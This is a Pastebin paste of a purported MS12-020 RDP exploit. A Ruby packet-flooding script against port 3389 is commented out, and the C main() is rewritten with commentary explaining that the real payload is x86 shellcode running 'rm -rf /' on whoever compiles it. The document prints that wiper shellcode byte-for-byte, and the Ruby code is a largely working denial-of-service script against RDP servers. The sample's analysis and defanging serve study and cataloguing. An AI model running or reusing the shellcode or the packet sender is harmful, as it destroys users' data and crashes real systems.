ms12-020_PRIVATE.c

a guest
Mar 16th, 2012
612
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.36 KB | None | 0 0
  1. ## ms12-020.c
  2. # change offset in main before compiling
  3. # 64bit shellcode available soon
  4. /*
  5. require 'socket'
  6.  
  7. def send_tpkt(sd, data)
  8. sd.write(make_tpkt(data))
  9. end
  10.  
  11. def make_tpkt(data)
  12. [
  13. 3, # version
  14. 0, # reserved
  15. 4 + data.length
  16. ].pack('CCn') + data
  17. end
  18.  
  19. def make_x224(data)
  20. [ data.length ].pack('C') + data
  21. end
  22.  
  23. def make_rdp(type, flags, data)
  24. [ type, flags, 4 + data.length ].pack('CCv') + data
  25. end
  26.  
  27. host = ARGV.shift
  28.  
  29. sd = TCPSocket.new(host, 3389)
  30. pkts1 = []
  31.  
  32. # craft connection request
  33. rdp = make_rdp(1, 0, [ 0 ].pack('V'))
  34. x224_1 = make_x224([
  35. 0xe0, # Connection request
  36. 0, # ??
  37. 0, # SRC-REF
  38. 0 # Class : Class 0
  39. ].pack('CnnC') + rdp)
  40.  
  41. pkts1 << make_tpkt(x224_1)
  42.  
  43. # craft connect-initial
  44. x224_2 = make_x224([
  45. 0xf0, # Data / Class 0
  46. 0x80 # EOT: True / NR: 0
  47. ].pack('CC'))
  48.  
  49. # mcsCi
  50. target_params = ""+
  51. #"\x02\x01\x00"+ # maxChannelIds
  52. "\x02\x01\x22"+ # maxChannelIds
  53. "\x02\x01\x0a"+ # maxUserIds
  54. "\x02\x01\x00"+ # maxTokenIds
  55. "\x02\x01\x01"+ # numPriorities
  56. "\x02\x01\x00"+ # minThroughput
  57. "\x02\x01\x01"+ # maxHeight
  58. "\x02\x02\xff\xff"+ # maxMCSPDUSize
  59. "\x02\x01\x02" # protocolVersion
  60. min_params = ""+
  61. "\x02\x01\x01"+ # maxChannelIds
  62. "\x02\x01\x01"+ # maxUserIds
  63. "\x02\x01\x01"+ # maxTokenIds
  64. "\x02\x01\x01"+ # numPriorities
  65. "\x02\x01\x00"+ # minThroughput
  66. "\x02\x01\x01"+ # maxHeight
  67. "\x02\x02\x04\x20"+ # maxMCSPDUSize
  68. "\x02\x01\x02" # protocolVersion
  69. max_params = ""+
  70. "\x02\x02\xff\xff"+ # maxChannelIds
  71. "\x02\x02\xfc\x17"+ # maxUserIds
  72. "\x02\x02\xff\xff"+ # maxTokenIds
  73. "\x02\x01\x01"+ # numPriorities
  74. "\x02\x01\x00"+ # minThroughput
  75. "\x02\x01\x01"+ # maxHeight
  76. "\x02\x02\xff\xff"+ # maxMCSPDUSize
  77. "\x02\x01\x02" # protocolVersion
  78.  
  79. userdata = ""+
  80. # gccCCrq
  81. "\x00\x05\x00\x14"+
  82. "\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63"+"\x61\x81\x1c"+
  83. # clientCoreData
  84. "\x01\xc0"+"\xd8\x00"+ # header (type, len)
  85. "\x04\x00"+"\x08\x00"+ # version
  86. "\x80\x02"+ # desktop width
  87. "\xe0\x01"+ # desktop height
  88. "\x01\xca"+ # color depth
  89. "\x03\xaa"+ # SASSequence
  90. "\x09\x04\x00\x00" + # keyboard layout
  91. "\xce\x0e\x00\x00" + # client build number
  92. # client name
  93. "\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  94. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  95. "\x04\x00\x00\x00"+ # keyboard type
  96. "\x00\x00\x00\x00"+ # kbd subType
  97. "\x0c\x00\x00\x00"+ # kbd FuncKey
  98. # imeFileName
  99. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  100. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  101. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  102. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  103. "\x01\xca"+ # postBeta2ColorDepth
  104. "\x01\x00"+ # clientProductId
  105. "\x00\x00\x00\x00" + # serialNumber
  106. "\x10\x00"+ # highColorDepth
  107. "\x07\x00"+ # supportedColorDepths
  108. "\x01\x00"+ # earlyCapabilityFlags
  109. # clientDigProductId -poc has: "00000-000-0000000-00000"
  110. "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00"+
  111. "\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"+
  112. "\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00"+
  113. "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  114. "\x00"+ # connectionType
  115. "\x00"+ # pad1octet
  116. "\x00\x00\x00\x00"+ # serverSelectedProtocol
  117. "\x04\xc0\x0c\x00"+ # desktopPhysicalWidth
  118. "\x0d\x00\x00\x00"+ # desktopPhysicalHeight
  119. "\x00\x00\x00\x00"+ # reserved
  120. # clientSecurityData
  121. "\x02\xc0"+"\x0c\x00"+ # header (type, len)
  122. "\x1b\x00\x00\x00"+ # encryptionMethods
  123. "\x00\x00\x00\x00"+ # extEncryptionMethods
  124. # clientNetworkData
  125. "\x03\xc0"+"\x2c\x00"+ # header (type, len)
  126. "\x03\x00\x00\x00"+ # channel count!
  127. # channel 0
  128. "rdpdr\x00\x00\x00"+ # name
  129. "\x00\x00\x80\x80"+ # options
  130. # channel 1
  131. "cliprdr\x00"+ # name
  132. "\x00\x00\xa0\xc0"+ # options
  133. # channel 2
  134. "rdpsnd\x00\x00"+ # name
  135. "\x00\x00\x00\xc0" # options
  136. # clientClusterData (not present)
  137. # clientMonitorData (not present)
  138.  
  139. mcs_data = ""+
  140. "\x04\x01\x01"+ # callingDomainSelector
  141. "\x04\x01\x01"+ # calledDomainSelector
  142. "\x01\x01\xff"+ # upwardFlag
  143. "\x30" + [ target_params.length ].pack('C') + target_params +
  144. "\x30\x41\x41" + [ min_params.length ].pack('C') + min_params +
  145. "\x30" + [ max_params.length ].pack('C') + max_params +
  146. # userData
  147. "\x04\x82" + [ userdata.length ].pack('n') + userdata
  148.  
  149. mcs = "\x7f\x65\x82" + [ mcs_data.length ].pack('n') # connect-initial (0x65 / 101), length
  150. mcs << mcs_data
  151.  
  152. pkts1 << make_tpkt(x224_2 + mcs)
  153.  
  154. # send a special one?
  155. #pkts1 << &nerf <<*zarfoo << make_tpkt(x224_2 + "\x04\x01\x00\x01\x00")
  156.  
  157. # send more pkts! - based on poc
  158. 8.times {
  159. pkts1 << make_tpkt(x224_2 + "\x28")
  160. }
  161.  
  162. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xea")
  163. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xeb")
  164. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xec")
  165. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xed")
  166. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xee")
  167. pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf0")
  168. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf1")
  169. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf2")
  170. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf3")
  171.  
  172. pkts1 << make_tpkt(x224_2 + "\x21\x80")
  173.  
  174. bigpkt = pkts1.join('')
  175.  
  176. 20.times { |x|
  177. puts "[*] Sending #{x + 1} ..."
  178. sd.write(bigpkt)
  179.  
  180. send_tpkt(sd, x224_2 + "\x2e\x00\x00\x01")
  181. #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x02")
  182. #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x03")
  183. #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x04")
  184.  
  185. # read connect-initial response
  186. buf = sd.recv(1500)
  187. # XXX: TODO: check response =)
  188. #puts buf
  189. }
  190.  
  191. sd.close
  192. */
  193.  
  194. #\x64\x69\x65\x20\x73\x6b\x69\x64\x64\x69\x65\x20\x73\x63\x75\x6d
  195. #\x65\x6e\x6a\x6f\x79\x20\x79\x6f\x75\x72\x20\x72\x6d
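/*
 * Program entry point. Despite the file name, nothing in this translation
 * unit touches port 3389: the Ruby packet builder above sits entirely inside
 * a C block comment, and the original body did exactly one thing — cast the
 * byte string below to a function pointer and call it.
 *
 * Those bytes are 32-bit x86 Linux machine code. Read as ASCII they already
 * contain "/bin//rm", "-r", "-f" and "/"; the opcodes around them load
 * syscall 11 (execve) into eax, build argv from those strings on the stack
 * and issue int 0x80. The "exploit" is therefore a wiper aimed at whoever
 * compiles and runs this file, not at any RDP server. The two hex-encoded
 * comments immediately above main() decode to "die skiddie scum" and
 * "enjoy your rm", which says the same thing.
 *
 * This version keeps the bytes as inert const data (so the sample still
 * matches on disk for anyone cataloguing it) and never transfers control to
 * them. It returns non-zero so a harness treating this as an exploit sees a
 * failure rather than a "success".
 */
int main(void)
{
    /* Original payload, unchanged byte-for-byte; retained as data only. */
    static const unsigned char payload[] =
        "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89"
        "\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68"
        "\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";
    (void)payload; /* deliberately never cast to a function pointer */

    fputs("ms12-020_PRIVATE.c: embedded payload is execve(\"/bin//rm\", "
          "{\"-r\", \"-f\", \"/\"}); refusing to execute it.\n",
          stderr);
    return 1;
}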